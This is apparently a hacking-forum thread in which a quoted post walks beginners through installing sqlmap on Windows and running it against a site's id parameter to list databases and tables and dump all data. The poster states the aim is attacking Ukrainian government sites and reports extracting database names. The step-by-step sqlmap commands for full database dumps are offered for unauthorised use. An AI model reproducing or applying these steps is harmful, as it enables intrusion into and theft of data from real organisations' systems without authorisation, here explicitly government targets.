(NEWBIES ONLY) SQLMAP Usage - Ross - 03-18-2023
Please login or register to view this content
RE: (NEWBIES ONLY) SQLMAP Usage - helloworld31 - 03-23-2023
(03-18-2023, 01:26 AM)Ross Wrote: I WILL USE WINDOWS.
1- sqlmap: automatic SQL injection and database takeover tool download sqlmap in here
extract the sqlmap in C:/
open powershell and type cd C:/sqlmap
now we can start hacking my aim is ukraine goverment sites.
python sqlmap.py -u ‘http:/linkofyoursite.com/221.php?id=221’
it gave me this db names.
now do python sqlmap.py -u ‘http:/linkofyoursite.com/221.php?id=221’ -D “dbname†-tables
it gaves the tables now we will dump all
sqlmap.py -u ‘http:/linkofyoursite.com/221.php?id=221’ -D dpbase_law –dump-all –batch i found this on >Multiple Ways to Dump Website Database via Sqlmap – Secnhack
dumping…
|